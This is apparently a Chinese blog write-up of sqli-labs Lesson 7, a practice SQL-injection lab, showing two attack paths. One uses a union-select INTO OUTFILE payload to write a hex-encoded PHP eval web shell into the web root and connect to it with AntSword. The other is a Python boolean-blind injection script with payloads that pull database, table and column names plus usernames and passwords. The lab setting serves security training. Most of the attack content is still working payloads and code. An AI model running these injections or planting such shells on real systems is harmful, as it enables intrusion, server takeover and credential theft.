lesson7单引号+双括号布尔盲注或一句话木马+蚁剑

lesson7单引号+双括号布尔盲注或一句话木马+蚁剑

6QMBWMC_gKlMbgbJjT1SjzErHXbHvUU9Aa7uHSpxT3M

1.验证注入点

从下面的注入测试来看,只有两种输出结果

如果sql执行了,就会输出“You are in… Use outfile…”,反之输入“You have an error in your SQL syntax”

?id=1 --+   --You are in.... Use outfile......
?id=1' --+  -- You have an error in your SQL syntax
?id=-1' --+ --You have an error in your SQL syntax
?id=1\ --+  --You are in.... Use outfile......

查看是否存在双引号注入

正常输出,说明有执行,存在双引号注入

?id=1"  --+ -- You are in.... Use outfile......

查看是否存在闭合特殊符号

?id=1' and 1=1--+  -- 报错,sql没有执行,存在闭合
?id=1') and 1=1--+  --报错,还有一个闭合
?id=1')) and 1=1--+  -- 正常输出

推测注入点:单引号+两个括号闭合

看一下源码,确定是双括号+单引号注入

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

构建个playload

?id=1')) --+ 

O6wWl4A8bAFJjMBWFQ65mRtGwBM9FRfPK90jg3bjQxw

2.爆字段个数

id=1')) order by 4--+

到4报错,说明有三个字段

bsDQlCJCcJgsvJ2tnJcQLhTmr9IsUi7n2kcwmeXtVHg

这里有两种方法

一、

3.找绝对路径

由于要得到网站的绝对路径,这里用靶场第二关来获得绝对路径。@@basedir()是安装MYSQL的安装路径 ,@@datadir()是安装MYSQL的数据文件路径。如果自己知道路径可以直接跳下一步。

?id=-1 union select 1,@@basedir,@@datadir --+

A6KUGzFq6qawU3CsnVV395rDP9rahTGtnbsP9_02GNU

yovsJ6UjnCH-NzcMGYcFQeYfaa9HTrXiMM-EaOEjW38

所以绝对路径是C:/phpstudy_pro/www/sqli-labs/less-7/

4.用into outfile函数写入一句话木马

注入语句为

?id=-1')) union select 1,0x3c3f706870206576616c28245f504f53545b636d645d293b3f3e,3 into outfile "C:/phpstudy_pro/www/sqli-labs/less-7/shell.php" --+

如果是自己服务器,记得把secure-file-priv选项加上

f8idkZ7_BiRILoFtXzgmHyiowdpqPKYXhsPoPOUGfYo

GHWx60vX5GEXVf52Vc35f4d5ls4SCFe-5V_WTBcE_GU

注入连接成功

n4U2KQtnKlWyQNYvZ4z3t9fVp0HfYq-sHzJxWcOhXbg

二、

3.判断数据库长度

判断当前使用的数据库名长度是否大于1(肯定大于),地址栏输入:

?id=1')) and length(database()) > 1 --+

判断成立,页面正常显示

4.判断字符

判断数据库名第一个字符的ascll码是否大于1(肯定大于),地址栏输入:

?id=1')) and ascii(substr((database()),1,1)) >1 --+

判断成立,页面正常显示

5.通过脚本进行攻击

import requests

# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload

# 目标网址(不带参数)
url = "http://xxxx/Less-7/"
# 猜解长度使用的payload
payload_len = """?id=1')) and length(
	(select group_concat(schema_name)
	from information_schema.schemata)
) ={n} --+"""
# 枚举字符使用的payload
payload_str = """?id=1')) and ascii(
  substr(
    (select group_concat(schema_name)
     from information_schema.schemata
	),{n},1)
) ={r} --+"""

# 获取长度
def getLength(url, payload):
    length = 1  # 初始测试长度为1
    while True:
        response = requests.get(url= url+payload_len.format(n= length))
        # 页面中出现此内容则表示成功
        if 'You are in....' in response.text:
            print('测试长度完成,长度为:', length,)
            return length;
        else:
            print('正在测试长度:',length)
            length += 1  # 测试长度递增

# 获取字符
def getStr(url, payload, length):
    str = ''  # 初始表名/库名为空
    # 第一层循环,截取每一个字符
    for l in range(1, length+1):
        # 第二层循环,枚举截取字符的每一种可能性
        for n in range(33, 126):
            response = requests.get(url= url+payload_str.format(n= l, r= n))
            # print('我正在猜解', n)
            # 页面中出现此内容则表示成功
            if 'You are in....' in response.text:
                str+= chr(n)
                print('第', l, '个字符猜解成功:', str)
                break;
    return str;

# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)

8xtlmaHCCEhqDuos720fCRWExUQlItYZdSpF7lsAaRQ

1L42g5gR8XGD624kMkxQ6P7MMl75sc4uNh3E_u2pC-E

获取 security 库的所有表

判断长度 payload:

?id=1')) and length((select group_concat(table_name) from information_schema.tables where table_schema="security"))={n}--+

判断字符payload:

?id=1')) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="security"),{n},1))={r}--+

5N17iLNE1fYNem4tUK4VK2K1OiM1sMA0H63MTHDealM

gip4STaW0zDIyYdsM2ObaIarPVF4JfKcUktC2CGxCC4

获取 users 表的所有字段

判断长度 payload:

?id=1')) and length((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))={n}--+

判断字符 payload:

?id=1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),{n},1))={r}--+

5SnRnuemxqOZ4sbEt93-hKwg3E7MqNJ_KJiP1kMwcJE

kvQQ9l6o4EpEcWMlzaFg6BpdGeWrdZp5HKjQlz52Oc8

获取username的所有值

判断长度 payload:

?id=1')) and length((select group_concat(username) from users))={n}--+

-dL912hIXjLVT8MS8lxFLKskzjzc8CJ1NNbrvZMfoAo

判断字符 payload:

?id=1')) and ascii(substr((select group_concat(username) from users),{n},1))={r}--+

8Wq70laiFqn20BxU-rAdjkqbPFI5XRZd1pgDFQMxV20

获取username的所有值

判断长度 payload:

?id=1')) and length((select group_concat(password) from users))={n}--+

0jKesuEPvwBVjvqA6EgVecIGx3PACtqVrkd0-zCSdIs

判断字符 payload:

?id=1')) and ascii(substr((select group_concat(password) from users),{n},1))={r}--+

TUAVx3SoW8xioTRPye6Dm3Et4Pa6Auj6_5Xs3dQeTvU

posted on 2024-03-19 17:57  跳河离去的鱼  阅读(28)  评论(0编辑  收藏  举报